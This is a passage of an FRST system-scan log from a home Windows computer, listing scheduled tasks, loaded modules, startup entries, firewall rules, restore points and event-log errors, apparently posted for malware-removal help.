Task: {03ECBFF5-C025-4739-8E50-8F4E8AEA2006} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {14CBC00D-5A6F-4542-BA8F-F735F987065E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {18F47D62-A171-49D0-9208-AFCD563ACBDE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {20596B4E-B9FC-4C02-B636-29C81118AD7C} - System32\Tasks\{B8C8760C-1B7F-4B92-B355-EB4EBC2220B7} => C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientApp.exe [2011-11-24] (Amazon.com)
Task: {2A1EB5A9-CC18-47FE-8ED5-E8204F70F004} - System32\Tasks\{B28ABF54-12F8-454B-BECD-94AEA917E9D4} => pcalua.exe -a C:\Users\Lexi\Downloads\465-INST-WIN7-A.EXE -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {30B217A2-ECDC-4497-B30E-BE246C50F52C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3181DE33-4525-4033-8EFC-B3B2A102EEB2} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {3A39070B-05D6-4FE4-B21D-6AC28162EA77} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {3F4414FF-AF57-4A12-BB5E-25465C03328D} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {4333970D-7AC2-4816-B4D0-C6B4A5AA8B0D} - System32\Tasks\{792CD4C5-BD69-431C-ADFE-8FC291ABBC34} => C:\Program Files (x86)\Audible\Bin\Manager.exe [2010-10-18] (Audible Inc.)
Task: {4456371C-D5F3-4556-BD69-3DEA9486D8BC} - System32\Tasks\{19CE7EC7-A1CF-43F2-82BD-2B92DB574877} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.)
Task: {4A73AF0D-B415-4A75-A48F-59B950DD814F} - System32\Tasks\{13906491-9562-4215-BED2-2F749B84FCF0} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN(1).exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {595AB45D-32BD-469C-AACD-876FC9D8B726} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {5E3BB964-5022-4A1C-92A6-1C246AEA028E} - System32\Tasks\{840E3E90-DFDD-4516-8907-ADFF482BB6E4} => pcalua.exe -a C:\Users\Lexi\Downloads\ActiveSetupN.exe -d C:\Users\Lexi\Downloads
Task: {65E6396D-2E9E-4959-BF08-DB12AD2957C2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {7A508896-C3CD-4300-BDAA-04953203925D} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {7AF5ABA6-423A-49B5-BA9D-1352F2D4DAED} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-12] (Google Inc.)
Task: {7CAD3314-D3AC-40CF-8B4F-15F972F88E57} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {846F76DA-20A7-45DD-80B6-63BABA67DE9D} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {85AEFD4C-BB58-4309-AB1A-0D23D826D497} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {8DB4574F-93DB-4D60-8F3D-E6E9973D5190} - System32\Tasks\{6E6318EC-3D88-4C46-A836-8ED495DD7ED2} => pcalua.exe -a C:\windows\system32\pcwrun.exe -c "C:\Program Files (x86)\Audible\Bin\Manager.exe"
Task: {8E5B2A0F-FC8A-423A-A8BE-3D7AB86A9511} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {9E9F9295-5A95-4BC1-92F1-538253A7EE57} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A0E37C5A-0E9E-4E5A-97CF-3A8FF2419BED} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {A49859AB-948A-4879-843B-C6F8C597EE05} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {AB79393A-65CD-45EF-A04C-516943694282} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {B0843801-EABC-4F14-836C-8D73C9CF75AA} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {B1EA027F-6C5F-4A60-922B-E3DF71943F1A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {B1EEF720-5581-431A-88EE-70AE9214EB06} - System32\Tasks\{579AE86B-2E4A-462C-A43D-A9CBDE59DABB} => pcalua.exe -a "C:\Users\Lexi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777U89LV\ActiveSetupN.exe" -d C:\Users\Lexi\Desktop
Task: {B7B1A35D-778B-4029-9785-944EAAEC7B62} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {B7ED6DC7-D029-4C26-B746-C8CEA0220FCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {C63794CC-3FA0-4129-A703-499ADA72BAC0} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C7018A72-D3B0-424D-8718-859D11159542} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {CED787AA-FC52-4914-965F-EC58A361E401} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {D2897A28-62CA-4684-A5EB-DAF35E369FEC} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {D39FA133-57CC-4534-B9DB-8BF97AA4BF6D} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {D5830A36-AEE1-4246-B3A5-AD088300900D} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {D9980B66-B0B0-49C7-BAD6-1E56A17F63F4} - System32\Tasks\{F173C27D-4866-4D3F-8CF8-F4AA5838C42A} => pcalua.exe -a C:\Users\Lexi\Downloads\BodyMediaArmbandReset(1).exe -d C:\Users\Lexi\Downloads
Task: {DDD64684-16CC-4C8E-8741-D465C0D1EE60} - System32\Tasks\{2CC5D8DF-1473-45CC-BECD-C52847C8BD47} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B
Task: {E42C5FDB-7D30-4A22-A9C8-AA3457DA6D6D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {F1BFB372-F5DF-4596-BEC2-F29A89056CE5} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {F840B761-34BF-4385-AE9A-F65F6D27E4B7} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {FE67C988-F7E5-4A52-94EE-E6C66EE41EAE} - System32\Tasks\{789ED4DD-0568-434B-88F2-2FB36DC7A2D7} => pcalua.exe -a C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B\DSETUP.EXE -d C:\Users\Lexi\Documents\OPS653v400B\OPS653ver400B

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-07-10 06:00 - 2015-07-10 06:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-27 23:59 - 2015-08-27 23:59 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-12 13:07 - 2015-08-11 04:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2011-04-11 09:37 - 2005-04-22 12:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-09-30 22:08 - 2015-09-17 01:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2012-11-26 22:54 - 2012-11-26 22:54 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 08762680 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-03 15:26 - 2009-11-03 15:26 - 00053560 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2010-05-28 20:34 - 2009-06-22 17:40 - 00022328 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2009-03-12 21:08 - 2009-03-12 21:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2009-07-25 19:38 - 2009-07-25 19:38 - 00017800 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 01091072 _____ () C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVCtrl.dll
2009-01-30 20:10 - 2009-01-30 20:10 - 01043456 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceRec.dll
2009-01-30 20:11 - 2009-01-30 20:11 - 07861248 _____ () C:\Program Files\TOSHIBA\SmartFaceV\FaceHI.dll
2010-03-12 17:41 - 2010-03-12 17:41 - 00417080 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe
2010-02-05 19:44 - 2010-02-05 19:44 - 00079192 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2015-07-10 06:00 - 2015-07-10 06:00 - 00215352 _____ () c:\windows\system32\WerEtw.dll
2011-11-24 00:21 - 2011-11-24 00:21 - 00105576 ____R () C:\Program Files (x86)\Amazon\Amazon Unbox Video\LimelightDownloadManager.dll
2011-07-19 14:26 - 2008-11-12 14:32 - 00014848 _____ () C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardPath.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00439504 _____ () C:\Program Files (x86)\Evernote\Evernote\libxml2.dll
2015-12-01 15:37 - 2015-12-01 15:37 - 00321232 _____ () C:\Program Files (x86)\Evernote\Evernote\libtidy.dll
2014-02-01 13:30 - 2014-02-01 13:30 - 00861184 _____ () C:\Program Files (x86)\LeapFrog\LeapFrog Connect\platforms\qwindows.dll
2013-07-27 21:59 - 2016-03-09 14:44 - 00046080 _____ () C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\NativeOperations.dll
2016-03-09 10:18 - 2016-03-09 10:18 - 00541696 _____ () C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:Updt_SummaryInformation [151]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Control Panel\Desktop\\Wallpaper -> c:\users\lexi\appdata\roaming\mozilla\firefox\desktop background.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\StartupFolder: => "Amazon Unbox.lnk"
HKLM\...\StartupApproved\StartupFolder: => "BodyMedia Sync.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Audible Download Manager.lnk"
HKLM\...\StartupApproved\StartupFolder: => "ScanSnap Manager.lnk"
HKLM\...\StartupApproved\Run32: => "BrMfcWnd"
HKLM\...\StartupApproved\Run32: => "ControlCenter3"
HKLM\...\StartupApproved\Run32: => "Secure Online Account Numbers"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "ScanSnap WIA Service Checker"
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\StartupApproved\Run: => "FileThis Fetch"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [uDP Query User{E520D0E0-0828-42E1-9B8F-D3A6F8885E82}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{1419A417-13D5-4702-BFD4-F63FBF5FFB87}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{A60CE462-6280-43D7-8043-4506596E8C0A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{99C87474-2E7B-4132-BA2B-B13267F3602E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{766F3D6F-3D90-4128-ADE7-3B980ABF4B0F}] => (Allow) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\LeapfrogConnect.exe
FirewallRules: [{7E7E8C92-1D6F-4F1B-84ED-326711765E73}] => (Allow) LPort=1900
FirewallRules: [{8839DD16-229F-4D59-AE9D-D31901B1A1E7}] => (Allow) LPort=2869
FirewallRules: [{CA4B34F1-7F78-44CA-9F85-C710F94C15D4}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [uDP Query User{89C13623-A2E8-4554-9ED3-A35ADD22F801}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{893572F9-21AA-4841-9065-1F2B956B3D19}C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\lexi\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{7B09EC93-7311-42C7-9076-F9DCBCC8882F}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{94AADD84-2E1F-4D28-ABA0-77B8E66501A9}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B776F243-5D48-4D87-98C3-4AC5992C2636}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{29BCFEEB-BF5C-4E1F-9690-49538EFC5E9D}] => (Allow) LPort=54925
FirewallRules: [{921DE0EB-FDAD-4FDF-90D6-7E13B8596699}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{17903D5B-36C6-4F8D-9832-003C6D005923}] => (Allow) C:\Program Files (x86)\Brother\Brmfl07a\FAXRX.exe
FirewallRules: [{E8406401-B39A-4877-B451-6D79C04CA923}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D753ECEB-34A2-4DC5-AD5C-B1A0E93512DB}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{044CAA22-7EB2-4B00-B629-31456C777E14}] => (Allow) svchost.exe
FirewallRules: [{F2FB915F-C948-46CF-B034-7FECCFF8B944}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{2B2D95DA-291D-427A-B6ED-25EB399F552F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{119ED0AD-8AF0-4676-80D5-5166F5F371B3}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C293909D-A688-4D73-AE69-CA0271E6FD70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-02-2016 16:51:34 Scheduled Checkpoint
03-03-2016 23:14:19 Removed Storia.
07-03-2016 12:51:40 Restore Operation
09-03-2016 10:01:33 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============

Name: JMicron PCIe xD Host Controller
Description: JMicron PCIe xD Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.

Name: JMicron PCIe SD/MMC Host Controller
Description: JMicron PCIe SD/MMC Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.

Name: JMicron PCIe MS Host Controller
Description: JMicron PCIe MS Host Controller
Class Guid: {4d36e970-e325-11ce-bfc1-08002be10318}
Manufacturer: JMicron Technology Corp.
Service: JMCR
Problem: : Currently, this hardware device is not connected to the computer. (Code 45).
Resolution: The device is not present or was previously attached to the computer.
To fix this problem, reconnect this hardware device to the computer.
If Device Manager is started with the environment variable DEVMGR_SHOW_NONPRESENT_DEVICES set to 1 (which means show these devices), then any previously attached (NONPRESENT) devices are displayed in the device list and assigned this error code.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (03/09/2016 02:56:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DURABLE)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:54 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca

Error: (03/09/2016 02:56:53 PM) (Source: DCOM) (EventID: 10010) (User: DURABLE)
Description: CortanaUI.AppXvnpnd8twsw5e3tvxsft49zej2zv793mw.mca


CodeIntegrity:
===================================
  Date: 2016-03-09 14:55:30.886
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:30.770
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:20.458
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 14:55:20.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.730
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.619
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.512
